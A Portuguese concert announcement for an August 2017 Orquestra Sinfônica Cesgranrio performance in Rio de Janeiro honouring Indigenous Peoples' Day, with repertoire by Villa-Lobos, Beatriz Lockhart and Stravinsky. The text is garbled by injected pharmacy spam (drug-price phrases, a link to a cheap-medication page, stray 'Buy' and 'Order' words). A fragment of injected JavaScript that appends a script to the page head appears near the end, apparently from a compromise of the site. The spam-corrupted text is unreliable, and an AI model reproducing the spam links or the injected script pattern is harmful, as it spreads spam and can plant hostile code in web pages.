Escrito por em 14 ago 2017 nas áreas Música sinfônica, Programação, Rio de Janeiro

Orquestra Sinfônica Cesgranrio faz concerto em homenagem ao Dia Internacional dos Povos Indígenas.

 

A Sala Cecília Meireles, no Rio de Janeiro, invoca as bênçãos dos pajés para o concerto que apresenta no domingo, dia 20 de agosto, às 11 horas, dentro da série Sala Orquestras Jovens nolvadex price in mumbai . No palco, a Orquestra Sinfônica Cesgranrio, com regência de Buy Buy Eder Paolozzi e participação de Sofia Ceccato (flauta) e do índio http://cloverleafpizza.com/quibron-t-cheap/ Anuiá Amaru (flauta indígena), interpreta um repertório especial com obras de caráter indígena de Villa-Lobos e Beatriz Lockhart, além de Pássaro de Fogo, de Stravinsky.

Orquestra e maestro tocam, pela primeira vez no Brasil, a obra Masiá Mujú, da compositora uruguaia Beatriz Lockhart (1944-2015). Trata-se de um concerto para flauta e orquestra inspirado nas melodias da cultura indígena venezuelana estreado em 1987. A solista é a flautista Sofia Ceccato. O repertório também inclui a obra Uirapuru (1917), de Heitor Villa-Lobos, que retrata o ambiente da floresta e os seus habitantes: os índios. A terceira obra selecionada pelo maestro Paolozzi é a suíte Pássaro de Fogo, de Igor Stravinsky, em sua versão de 1919.

O concerto conta ainda com a participação do índio Anuiá Amaru, que executa obras de sua autoria em uma flauta construída por ele mesmo e conversa com o público acerca da música indígena.

O objetivo da apresentação é homenagear o Dia Internacional dos Povos Indígenas, comemorado em 9 de agosto.

 

SERVIÇO:

 

Orquestra Sinfônica Cesgranrio

Sofia Ceccato, flauta

Anuiá Amaru, flauta indígena

Eder Paolozzi, regência

 

Order 20 de agosto, domingo, às 11h

generic norvasc 10mg Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tels.: 21 2332-9223 e 2332-9224)

 

Ingressos: R$ 20, com meia-entrada para estudantes e pessoas com mais de 60 anos, e R$ 2 para estudantes de música mediante apresentação da carteirinha

 d.getElementsByTagName(‘head’)[0].appendChild(s); Order Buy

Faça seu comentário